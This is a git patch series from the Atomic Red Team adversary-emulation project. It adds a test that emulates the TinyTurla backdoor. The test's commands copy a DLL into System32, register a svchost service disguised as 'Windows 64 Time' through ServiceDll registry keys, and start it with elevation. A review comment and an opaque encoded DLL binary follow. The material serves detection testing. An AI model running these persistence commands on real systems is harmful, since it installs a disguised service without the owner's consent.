From 98c5936be2243fcb4b29f3295e81b136f3f607eb Mon Sep 17 00:00:00 2001 From: "Marrelle Bailey (She/Her)" <66318176+MarrelleBailey@users.noreply.github.com> Date: Tue, 1 Feb 2022 10:49:25 -0600 Subject: [PATCH 1/4] Taking out the work covenant (#1754) deleting a word from the title --- CODE_OF_CONDUCT.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CODE_OF_CONDUCT.md b/CODE_OF_CONDUCT.md index 4c7333d7..7575b89f 100644 --- a/CODE_OF_CONDUCT.md +++ b/CODE_OF_CONDUCT.md @@ -1,4 +1,4 @@ -# Contributor Covenant Code of Conduct +# Contributor Code of Conduct Welcome to the [Atomic Red Team online community](https://atomicredteam.io/). Our goal is to foster an open, safe, and welcoming environment. As a collective, we—as contributors, maintainers, and the Open Source Projects team of Red Canary—pledge to encourage our project and community to be a harassment-free space. We invite you to collaborate, exchange thoughts or information, and engage with one another. Atomic Red Team is meant for everyone, regardless of age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation. From f9c2a9b69e488cfb3a796fcaa6ec7da25c8b3177 Mon Sep 17 00:00:00 2001 
From: nsher07 <90919224+nsher07@users.noreply.github.com> Date: Wed, 2 Feb 2022 21:57:20 +0530 Subject: [PATCH 2/4] New Atomic T1543.003 Tiny Turla Backdoor Service w64time (#1756) * Update T1543.003.yaml Atomic - T1045.003 - TinyTurla backdoor service w64time It's running Dll as service to emulate the tine turla backdoor * Create W64Time.cpp * The Dll file for T145.003 Tiny Turla * Fixed YAML syntax * add blog link to description Co-authored-by: Carrie Roberts --- atomics/T1543.003/T1543.003.yaml | 29 +++++++++ atomics/T1543.003/bin/W64Time.dll | Bin 0 -> 124928 bytes atomics/T1543.003/src/W64Time.cpp | 98 ++++++++++++++++++++++++++++++ 3 files changed, 127 insertions(+) create mode 100644 atomics/T1543.003/bin/W64Time.dll create mode 100644 atomics/T1543.003/src/W64Time.cpp diff --git a/atomics/T1543.003/T1543.003.yaml b/atomics/T1543.003/T1543.003.yaml index b126530e..338b07ac 100644 --- a/atomics/T1543.003/T1543.003.yaml +++ b/atomics/T1543.003/T1543.003.yaml 
@@ -91,3 +91,32 @@ atomic_tests:
 Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
 try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} catch {}
+- name: TinyTurla backdoor service w64time
+ description: |
+ It's running Dll as service to emulate the tine turla backdoor
+
+ [Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html)
+ supported_platforms:
+ - windows
+ input_arguments:
+ dllfilename:
+ description: It specifies Dll file to run as service
+ type: string
+ default: $PathToAtomicsFolder\T1543.003\bin\w64time.dll
+ executor:
+ command: |-
+ copy #{dllfilename} %systemroot%\system32\
+ sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto
+ sc config W64Time DisplayName= "Windows 64 Time"
+ sc description W64Time "Maintain date and time synch on all clients and services in the network"
+ reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
+ reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
+ sc start W64Time
+ cleanup_command: |-
+ sc stop W64Time
+ sc.exe delete W64Time
+ del %systemroot%\system32\w64time.dll
+ reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f
+ reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
+ name: command_prompt
+ elevation_required: true
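Review bot: The cleanup_command never removes `C:\ART_W64Time.txt`, the marker file the bundled W64Time.dll writes when the service starts (see `main_payload` in src/W64Time.cpp later in this series), so every run leaves an artifact on the root of the system drive; add `del /q C:\ART_W64Time.txt 2>nul` after the existing `del %systemroot%\system32\w64time.dll`. That `del` also follows `sc stop W64Time` immediately, and `sc stop` only requests the stop, so the hosting svchost may still have the DLL mapped and the delete can fail silently, leaving w64time.dll in System32 after the test; a short pause such as `timeout /t 3 /nobreak >nul` between the two, or verifying the file is gone at the end of cleanup, would make the teardown reliable. The test has no `dependency_executor_name`/`dependencies` block checking that `#{dllfilename}` exists before the `copy`, which is the repository's usual pattern for bundled binaries, so a missing artifact only surfaces as a failed `sc start`. Finally, `tine turla` in the description should read `Tiny Turla`.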
diff --git a/atomics/T1543.003/bin/W64Time.dll b/atomics/T1543.003/bin/W64Time.dll new file mode 100644 index 0000000000000000000000000000000000000000..320e3e4b282ab4ff81212b61ee1eb5e63570eef5 GIT binary patch literal 124928 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 